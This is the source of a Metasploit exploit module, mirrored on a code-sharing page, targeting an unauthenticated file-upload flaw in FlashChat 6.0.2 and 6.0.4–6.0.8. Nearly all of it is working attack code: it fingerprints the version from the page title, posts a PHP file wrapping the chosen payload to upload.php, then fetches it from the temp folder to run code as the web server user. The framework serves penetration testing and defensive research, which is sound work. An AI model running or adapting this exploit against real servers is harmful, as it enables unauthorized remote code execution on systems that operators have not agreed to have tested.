Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/flashchat_upload_exec.rb
24014 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::EXE

11
  include Msf::Exploit::FileDropper

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => "FlashChat Arbitrary File Upload",

18
        'Description' => %q{

19
          This module exploits a file upload vulnerability found in FlashChat

20
          versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload

21
          feature in order to upload malicious PHP files without authentication

22
          which results in arbitrary remote code execution as the web server user.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'x-hayben21', # Discovery and PoC

27
          'bcoles' # Metasploit

28
        ],

29
        'References' => [

30
          ['CVE', '2013-10038'],

31
          ['OSVDB', '98233'],

32
          ['EDB', '28709']

33
        ],

34
        'Payload' => {

35
          'BadChars' => "\x00"

36
        },

37
        'Arch' => ARCH_PHP,

38
        'Platform' => 'php',

39
        'Targets' => [

40
          # Tested on FlashChat version 6.0.8

41
          [ 'Generic (PHP Payload)', {} ]

42
        ],

43
        'Privileged' => false,

44
        'DisclosureDate' => '2013-10-04',

45
        'DefaultTarget' => 0,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53


54
    register_options(

55
      [

56
        OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])

57
      ]

58
    )

59
  end

60


61
  #

62
  # Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.8

63
  #

64
  def check

65
    uri = normalize_uri(target_uri.path, '')

66
    res = send_request_raw({ 'uri' => uri })

67


68
    if not res

69
      vprint_error("Connection timed out")

70
      return Exploit::CheckCode::Unknown

71
    end

72


73
    version = res.body.scan(/<title>FlashChat v([\d\.]+)/).flatten[0] || ''

74


75
    if version.empty?

76
      return Exploit::CheckCode::Unknown

77
    end

78


79
    vprint_status("Version found: #{version}")

80


81
    if version =~ /6\.0\.(2|4|5|6|7|8)/

82
      return Exploit::CheckCode::Appears

83
    elsif version <= "6.0.8"

84
      return Exploit::CheckCode::Detected

85
    else

86
      return Exploit::CheckCode::Safe

87
    end

88
  end

89


90
  #

91
  # Uploads our malicious file

92
  # Stolen from havalite_upload_exec.rb

93
  #

94
  def upload(base)

95
    fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"

96
    php = "<?php #{payload.encoded} ?>"

97
    data = Rex::MIME::Message.new

98
    data.add_part(php, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{fname}\"")

99
    post_data = data.to_s

100


101
    res = send_request_cgi({

102
      'method' => 'POST',

103
      'uri' => normalize_uri(base, 'upload.php'),

104
      'ctype' => "multipart/form-data; boundary=#{data.bound}",

105
      'data' => post_data

106
    })

107


108
    if not res

109
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")

110
    elsif res.code.to_i == 404

111
      fail_with(Failure::NotFound, "#{peer} - No upload.php found")

112
    elsif res.code.to_i == 500

113
      fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")

114
    end

115


116
    return fname

117
  end

118


119
  #

120
  # Executes our uploaded malicious file

121
  # Stolen from havalite_upload_exec.rb

122
  #

123
  def exec(base, payload_fname)

124
    res = send_request_raw({

125
      'uri' => normalize_uri(base, 'temp', payload_fname)

126
    })

127


128
    if res and res.code == 404

129
      fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")

130
    end

131
  end

132


133
  def exploit

134
    base = target_uri.path

135


136
    # upload

137
    print_status("Uploading malicious file...")

138
    fname = upload(base)

139


140
    # register the file to clean

141
    register_files_for_cleanup(fname)

142


143
    # exec

144
    print_status("Executing #{fname}...")

145
    exec(base, fname)

146
  end

147
end

148


149